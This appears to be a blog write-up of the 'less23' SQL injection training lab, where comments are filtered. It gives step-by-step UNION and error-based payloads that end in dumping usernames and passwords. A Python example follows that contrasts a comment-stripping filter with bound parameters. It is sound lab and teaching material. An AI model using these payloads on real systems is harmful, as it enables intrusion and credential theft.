SQL injection less23 (filter comment)
2022-07-28 12:15:00 【Hua Weiyun】
?id=1
?id=1'
''1'' LIMIT 0,1'
First strip one single quotation mark from each end (the error message wraps the fragment in them, like ordinary quotation marks), which leaves '1'' LIMIT 0,1
So the parameter is clearly enclosed in single quotation marks, and the query is:
SELECT * FROM users WHERE id='$id' LIMIT 0,1
Because comments are filtered, we close the trailing single quotation mark manually instead:
?id=1' and '1'='1
?id=1' and '1'='2
Error-based injection looks worth trying, because error messages are displayed:
?id=1' and updatexml(1, concat('#', database()), 1) and '1'='1
The trailing LIMIT 0,1 is still appended at the end, which may be what makes the statement fail.
So give up on error-based injection.
Try union injection, because there is an echo point:
?id=1' order by 4 and '1'='1
This does not reveal the number of columns.
Use union directly and test the number of columns one at a time:
?id=1' union select 1,'2
This one works:
?id=1' union select 1,2,'3
Find the echo position:
?id=-1' union select 1,2,'3
Query the database:
?id=-1' union select 1,(select concat(database(), 0x7e, @@basedir)),'3
List the tables:
?id=-1' union select 1, (select group_concat(table_name) from information_schema.tables where table_schema="security"),'3
List the columns:
?id=-1' union select 1, (select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"),'3
Read the data:
?id=-1' union select 1, (select group_concat(username,0x3a,password) from security.users),'3
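Why the comment filter does not stop any of this, shown as an added example that is not code from the original post or from the lab: the same inputs are run through a comment-stripping filter with string concatenation and then through a bound parameter. Python's sqlite3 stands in for the lab's PHP and MySQL; the table contents, function names and filter regex are assumptions.

```python
import re
import sqlite3

def make_db():
    """Constructed sample table standing in for the lab's users table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "pw-a"), (2, "bob", "pw-b")])
    return db

def strip_comments(value):
    """Assumed filter: delete the '#' and '--' comment markers from the input."""
    return re.sub(r"#|--", "", value)

def lookup_filtered(db, raw_id):
    """Weak form: filter comments, then concatenate the value into the query."""
    sql = "SELECT * FROM users WHERE id='" + strip_comments(raw_id) + "' LIMIT 0,1"
    return db.execute(sql).fetchall()

def lookup_bound(db, raw_id):
    """Hardened form: the value is bound as data and never parsed as SQL."""
    return db.execute("SELECT * FROM users WHERE id = ? LIMIT 0,1", (raw_id,)).fetchall()

# Inputs taken from the post; none of them contains a comment marker.
INPUTS = ["1", "1' and '1'='1", "1' and '1'='2", "-1' union select 1,2,'3"]

def compare(db):
    """Return {input: (filtered_result, bound_result)} for each sample input."""
    return {i: (lookup_filtered(db, i), lookup_bound(db, i)) for i in INPUTS}

if __name__ == "__main__":
    for value, (weak, safe) in compare(make_db()).items():
        print(f"{value!r:28} filtered={weak} bound={safe}")
```

With the filtered lookup, the two boolean inputs return different rows and the union input echoes its own 1, 2, '3' row; with the bound lookup only the literal id 1 matches anything.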